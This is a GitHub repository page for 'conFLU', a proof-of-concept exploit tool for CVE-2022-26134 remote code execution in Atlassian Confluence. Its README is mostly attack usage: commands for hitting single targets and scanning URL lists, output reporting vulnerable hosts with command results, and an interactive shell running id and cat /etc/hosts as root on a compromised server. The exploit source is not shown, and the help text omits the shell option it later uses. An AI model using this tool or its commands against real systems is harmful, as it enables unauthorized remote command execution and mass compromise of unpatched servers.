Skip to content

Luchoane/CVE-2022-26134_conFLU

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 

Repository files navigation

CVE-2022-26134 - conFLU

PoC for exploiting CVE-2022-26134 on Atlassian Confluence

Exploit Usage

python3 conFLU.py -h
Usage: conFLU.py [-h] [-u URL] [-f F] [-cmd CMD]

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     target url
  -f F, --file F        url file
  -c CMD, --command CMD
                        command

Exploit single target:

$ python3 conFLU.py -u http://[redacted].com -c id


                           ******** **       **     **
                          /**///// /**      /**    /**
  *****   ******  ******* /**      /**      /**    /**
 **///** **////**//**///**/******* /**      /**    /**
/**  // /**   /** /**  /**/**////  /**      /**    /**
/**   **/**   /** /**  /**/**      /**      /**    /**
//***** //******  ***  /**/**      /********//*******
 /////   //////  ///   // //       ////////  ///////

                       </coded by Luchoane>

[++++++] VULNERABLE: https://xxx.xxx.xxx.xxx | [uid=1009(confluence) gid=1009(confluence) groups=1009(confluence)]

Exploit url list

$ python3 conFLU.py -f list.txt -c id

                           ******** **       **     **
                          /**///// /**      /**    /**
  *****   ******  ******* /**      /**      /**    /**
 **///** **////**//**///**/******* /**      /**    /**
/**  // /**   /** /**  /**/**////  /**      /**    /**
/**   **/**   /** /**  /**/**      /**      /**    /**
//***** //******  ***  /**/**      /********//*******
 /////   //////  ///   // //       ////////  ///////

                       </coded by Luchoane>

[-] NOT VULNERABLE: https://xxx.xxx.xxx.xxx
[!] There was an error connecting!
[!] There was an error connecting!
[++++++] VULNERABLE: https://xxx.xxx.xxx.xxx | [uid=1009(confluence) gid=1009(confluence) groups=1009(confluence)]

--------------------------
Vulnerable targets scanned:
[+] https://xxx.xxx.xxx.xxx

Interactive shell

$ python3 conFLU.py -s xxx.xxx.xxx.xxx

                           ******** **       **     **
                          /**///// /**      /**    /**
  *****   ******  ******* /**      /**      /**    /**
 **///** **////**//**///**/******* /**      /**    /**
/**  // /**   /** /**  /**/**////  /**      /**    /**
/**   **/**   /** /**  /**/**      /**      /**    /**
//***** //******  ***  /**/**      /********//*******
 /////   //////  ///   // //       ////////  ///////

                       </coded by Luchoane>

Welcome to the interactive shell for: https://xxx.xxx.xxx.xxx
User: root

> id
uid=0(root) gid=0(root) groups=0(root)

> cat /etc/hosts
127.0.0.1   localhost localhost.localdomain localhost4 localhost4.localdomain4 ::1         localhost6 localhost6.localdomain6

> 

About

PoC for exploiting CVE-2022-26134 on Confluence

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages